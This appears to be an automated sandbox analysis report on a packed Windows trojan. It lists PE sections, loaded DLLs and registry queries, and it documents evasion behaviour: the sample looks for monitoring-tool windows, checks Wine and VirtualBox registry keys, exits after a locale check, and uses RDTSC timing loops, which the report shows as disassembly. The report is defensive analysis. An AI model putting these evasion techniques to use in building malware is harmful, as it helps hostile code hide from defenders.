              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068D1200_2_0068D120
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00701AA10_2_00701AA1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00706A9B0_2_00706A9B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059AB7A0_2_0059AB7A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FE3450_2_006FE345
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079834E0_2_0079834E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E2B1E0_2_006E2B1E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FAC440_2_006FAC44
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CFC2F0_2_005CFC2F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007085160_2_00708516
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070AD830_2_0070AD83
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007036070_2_00703607
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0064C6970_2_0064C697
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00344A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: chbioofn ZLIB complexity 0.9947662911084044
              Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00363A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00363A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0035CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_0035CAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\QWKWT2D1.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1787392 > 1048576
              Source: file.exeStatic PE information: Raw size of chbioofn is bigger than: 0x100000 < 0x19a800

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.340000.0.unpack :EW;.rsrc:W;.idata :W; :EW;chbioofn:EW;gsyzfhio:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;chbioofn:EW;gsyzfhio:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00366390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00366390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1c25f6 should be: 0x1bfeaa
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: chbioofn
              Source: file.exeStatic PE information: section name: gsyzfhio
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B8871 push esi; mov dword ptr [esp], ecx0_2_007B8B68
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069987D push 128D4372h; mov dword ptr [esp], ebx0_2_00699899
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069987D push ebx; mov dword ptr [esp], ecx0_2_0069989D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069987D push edx; mov dword ptr [esp], ebp0_2_006998AE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069987D push ebp; mov dword ptr [esp], 58ACD84Ch0_2_006998CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069987D push 21D5D28Dh; mov dword ptr [esp], ecx0_2_006998E4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069987D push ecx; mov dword ptr [esp], ebx0_2_0069994B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069987D push ebx; mov dword ptr [esp], edx0_2_00699971
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079D81D push ebx; mov dword ptr [esp], 6FFF6F0Ch0_2_0079D873
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079D81D push 289675F7h; mov dword ptr [esp], ecx0_2_0079D8FA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push edi; mov dword ptr [esp], 7FFDD651h0_2_00700014
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push 0DC4A0BFh; mov dword ptr [esp], esi0_2_00700070
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push edi; mov dword ptr [esp], ecx0_2_007000B4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push ebp; mov dword ptr [esp], eax0_2_00700159
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push esi; mov dword ptr [esp], ecx0_2_007001F5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push edi; mov dword ptr [esp], ebx0_2_007001FB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push eax; mov dword ptr [esp], edx0_2_007002E8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push 6F618C76h; mov dword ptr [esp], edx0_2_00700342
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push ebp; mov dword ptr [esp], eax0_2_0070034C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push 19F06152h; mov dword ptr [esp], ebp0_2_00700360
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push 41040967h; mov dword ptr [esp], ebx0_2_00700379
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push ebx; mov dword ptr [esp], edx0_2_007003DC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push eax; mov dword ptr [esp], ebp0_2_00700410
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push 66ECFC12h; mov dword ptr [esp], edi0_2_00700478
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push ebx; mov dword ptr [esp], 27D90D5Dh0_2_0070047F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push 35102AAEh; mov dword ptr [esp], ebp0_2_00700497
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push edx; mov dword ptr [esp], esp0_2_00700547
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push edx; mov dword ptr [esp], 032FEE2Ch0_2_007005A2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push esi; mov dword ptr [esp], 6FF79FD9h0_2_007005B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push eax; mov dword ptr [esp], edi0_2_007005BF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E push esi; mov dword ptr [esp], eax0_2_007005D7
              Source: file.exeStatic PE information: section name: chbioofn entropy: 7.953525251128387

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00366390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00366390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-25973
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F94E second address: 70F96C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F3874C2D1E4h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F96C second address: 70F970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706629 second address: 70662F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70662F second address: 706635 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70E90D second address: 70E911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70EA72 second address: 70EA76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70ED42 second address: 70ED4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3874C2D1D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70ED4C second address: 70ED50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70EFF2 second address: 70EFF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70EFF6 second address: 70F021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F38751214C5h 0x0000000c jmp 00007F38751214B9h 0x00000011 jo 00007F38751214A6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F021 second address: 70F027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F027 second address: 70F02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F02B second address: 70F050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3874C2D1E4h 0x00000007 jo 00007F3874C2D1D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710B19 second address: 710B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710B21 second address: 710B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710B2E second address: 710B34 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710B34 second address: 710B3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710B3B second address: 710B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D1CB1h], edi 0x0000000e push 00000000h 0x00000010 call 00007F38751214ADh 0x00000015 pop edi 0x00000016 call 00007F38751214A9h 0x0000001b push eax 0x0000001c pushad 0x0000001d jmp 00007F38751214B9h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710B7F second address: 710BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F3874C2D1DDh 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push edx 0x00000012 jbe 00007F3874C2D1D6h 0x00000018 pop edx 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710CD1 second address: 710CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F38751214AAh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710CDF second address: 710D10 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov esi, dword ptr [ebp+122D399Ah] 0x0000000f push 00000000h 0x00000011 mov esi, dword ptr [ebp+122D3662h] 0x00000017 push 5D4D8D4Dh 0x0000001c pushad 0x0000001d jnl 00007F3874C2D1DCh 0x00000023 push eax 0x00000024 push edx 0x00000025 jns 00007F3874C2D1D6h 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710D10 second address: 710D14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710DE0 second address: 710E6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F3874C2D1E0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push ebx 0x00000013 jmp 00007F3874C2D1E5h 0x00000018 pop ebx 0x00000019 push edi 0x0000001a pushad 0x0000001b popad 0x0000001c pop edi 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push esi 0x00000021 js 00007F3874C2D1E4h 0x00000027 jmp 00007F3874C2D1DEh 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 jmp 00007F3874C2D1DFh 0x00000036 pop eax 0x00000037 jmp 00007F3874C2D1E6h 0x0000003c lea ebx, dword ptr [ebp+12454A32h] 0x00000042 mov edx, dword ptr [ebp+122D1DAFh] 0x00000048 xchg eax, ebx 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710E6D second address: 710E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710EE2 second address: 710EEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710EEB second address: 710F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov esi, dword ptr [ebp+122D3826h] 0x0000000f push 00000000h 0x00000011 mov ecx, dword ptr [ebp+122D3996h] 0x00000017 push EBBB6339h 0x0000001c push edi 0x0000001d jng 00007F38751214ACh 0x00000023 pop edi 0x00000024 add dword ptr [esp], 14449D47h 0x0000002b mov dword ptr [ebp+122D1DA0h], edi 0x00000031 push 00000003h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007F38751214A8h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d push 00000000h 0x0000004f push 00000000h 0x00000051 push esi 0x00000052 call 00007F38751214A8h 0x00000057 pop esi 0x00000058 mov dword ptr [esp+04h], esi 0x0000005c add dword ptr [esp+04h], 00000019h 0x00000064 inc esi 0x00000065 push esi 0x00000066 ret 0x00000067 pop esi 0x00000068 ret 0x00000069 xor ecx, dword ptr [ebp+122D363Ah] 0x0000006f push 00000003h 0x00000071 mov edx, dword ptr [ebp+122D385Ah] 0x00000077 call 00007F38751214A9h 0x0000007c pushad 0x0000007d push eax 0x0000007e push edx 0x0000007f push esi 0x00000080 pop esi 0x00000081 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710F85 second address: 710F93 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F3874C2D1D6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710F93 second address: 710F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710F97 second address: 710FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710FA3 second address: 710FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F38751214A6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710FB0 second address: 710FB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710FB4 second address: 710FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push esi 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710FC3 second address: 710FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 mov eax, dword ptr [eax] 0x00000008 jnp 00007F3874C2D1E4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710FD5 second address: 710FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710FD9 second address: 71100E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F3874C2D1DFh 0x00000012 jmp 00007F3874C2D1E8h 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71100E second address: 71104C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push edx 0x0000000a xor esi, dword ptr [ebp+122D37EAh] 0x00000010 pop edx 0x00000011 mov dx, E6D0h 0x00000015 lea ebx, dword ptr [ebp+12454A3Dh] 0x0000001b mov dword ptr [ebp+122D1C6Ah], eax 0x00000021 xchg eax, ebx 0x00000022 push edx 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007F38751214AFh 0x0000002b popad 0x0000002c pop edx 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71104C second address: 711050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711050 second address: 711054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711054 second address: 71105A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FE0C second address: 72FE11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FE11 second address: 72FE17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FE17 second address: 72FE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F38751214AEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FE34 second address: 72FE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3874C2D1DEh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3874C2D1E4h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FE5F second address: 72FE63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FFD1 second address: 72FFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73011D second address: 730132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F38751214ABh 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730132 second address: 730138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730138 second address: 73013D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73013D second address: 730159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3874C2D1DCh 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730159 second address: 730186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F38751214B1h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F38751214B1h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73030C second address: 730314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7304C0 second address: 7304C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
